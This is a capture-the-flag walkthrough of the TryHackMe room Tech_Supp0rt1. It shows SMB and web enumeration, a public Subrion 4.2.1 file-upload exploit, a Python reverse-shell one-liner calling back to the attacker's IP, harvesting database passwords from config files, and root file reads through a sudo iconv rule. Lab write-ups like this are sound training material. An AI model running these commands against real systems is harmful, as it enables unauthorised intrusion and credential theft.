CTF : Tech_Supp0rt1

CTF Tech_Supp0rt1 writeup. Source THM. Announced difficulty level: Easy

Posted by Boula-Bytes on 12 May 2022

CTF : Tech_Supp0rt1

Informations

  • IP: 10.10.199.224
  • MYIP: 10.8.98.126

First enumeration

Basics

  • NMAP
console
$ nmap -p- -A 10.10.199.224

Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-11 22:39 CEST
Nmap scan report for 10.10.199.224
Host is up (0.037s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 10:8a:f5:72:d7:f9:7e:14:a5:c5:4f:9e:97:8b:3d:58 (RSA)
|   256 7f:10:f5:57:41:3c:71:db:b5:5b:db:75:c9:76:30:5c (ECDSA)
|_  256 6b:4c:23:50:6f:36:00:7c:a6:7c:11:73:c1:a8:60:0c (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2022-05-11T20:46:05
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: techsupport
|   NetBIOS computer name: TECHSUPPORT\x00
|   Domain name: \x00
|   FQDN: techsupport
|_  System time: 2022-05-12T02:16:03+05:30
|_clock-skew: mean: -1h50m00s, deviation: 3h10m31s, median: 0s

Vulnerabilities search

console
$ smbmap -H 10.10.199.224
[+] Guest session       IP: 10.10.199.224:445   Name: 10.10.199.224                                     
        Disk                                                    Permissions Comment
    ----                                                    ----------- -------
    print$                                              NO ACCESS   Printer Drivers
    websvr                                              READ ONLY   
    IPC$                                                NO ACCESS   IPC Service (TechSupport server (Samba, Ubuntu))

Let's browse websrv share : smb://10.10.199.224/websvr/

There is one file : enter.txt

console
cat enter.txt                   
GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website

IMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]
Wordpress creds
|->

Ok there is a subrion site installed but it's config is broken.

I used cyberchef and use the magic to reveal the password.

Now we have to find the panel. I use gobuster to help me ;)

console
$ gobuster dir -f -w /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt -u http://10.10.199.224/subrion/ -x cgi,html,txt,js,php,php.bak,bak,zip,sql,sql.bak,tgz,tar.gz,bkp,tar,rar,id_rsa,log,xml,json,sh,py,pl,rb,csv,pub,jar -b 404,302
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.199.224/subrion/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt
[+] Negative Status codes:   302,404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              tgz,tar.gz,pl,pub,jar,json,php,php.bak,bak,sql,sql.bak,tar,id_rsa,sh,rb,html,txt,js,zip,rar,log,py,cgi,bkp,xml,csv
[+] Add Slash:               true
[+] Timeout:                 10s
===============================================================
2022/05/11 23:18:04 Starting gobuster in directory enumeration mode
===============================================================
/sitemap.xml          (Status: 200) [Size: 628]
/updates/             (Status: 403) [Size: 278]
/license.txt          (Status: 200) [Size: 35147]
/install/             (Status: 200) [Size: 13095]
/changelog.txt        (Status: 200) [Size: 49250]
/robots.txt           (Status: 200) [Size: 142]
console
curl http://10.10.199.224/subrion/robots.txt
User-agent: *
Disallow: /backup/
Disallow: /cron/?
Disallow: /front/
Disallow: /install/
Disallow: /panel/
Disallow: /tmp/
Disallow: /updates/

Here we go :

http://10.10.199.224/subrion/panel/

subrion version is 4.2.1

console
$ searchsploit subrion 4.2.1
------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                       |  Path
------------------------------------------------------------------------------------- ---------------------------------
Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting                              | php/webapps/47469.txt
Subrion CMS 4.2.1 - 'avatar[path]' XSS                                               | php/webapps/49346.txt
Subrion CMS 4.2.1 - Arbitrary File Upload                                            | php/webapps/49876.py
Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)                     | php/webapps/50737.txt
Subrion CMS 4.2.1 - Cross-Site Scripting                                             | php/webapps/45150.txt
------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

The arbitrary file upload exploit is that we need ! ;)

Exploit

console
$ searchsploit -m php/webapps/49876.py
console
$ python3 49876.py -l admin -p ***** -u http://10.10.199.224/subrion/panel/

And we can launch system commands !

Then : 

console
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.98.126",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

And we got a shell ! :)

Privilege escalation

Enumeration for privesc

console
$ cat /var/www/html/wordpress/wp-config.php
[...]
/** MySQL database username */
define( 'DB_USER', 'support' );

/** MySQL database password */
define( 'DB_PASSWORD', '*****' );
[...]
console
$ cat /var/www/html/subrion/includes/config.inc.php
[...]
define('INTELLI_DBUSER', 'subrionuser');
define('INTELLI_DBPASS', '*****');
[...]

Now we find two passwords, let's see if one of them is the scamsite user one. And the wordpress one is good :)

Note that we could use ssh to have a stable shell.

console
$ sudo -l
Matching Defaults entries for scamsite on TechSupport:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User scamsite may run the following commands on TechSupport:
    (ALL) NOPASSWD: /usr/bin/iconv

Exploit

We can use iconv to read files :

console
$ sudo iconv -f 8859_1 -t 8859_1 /root/root.txt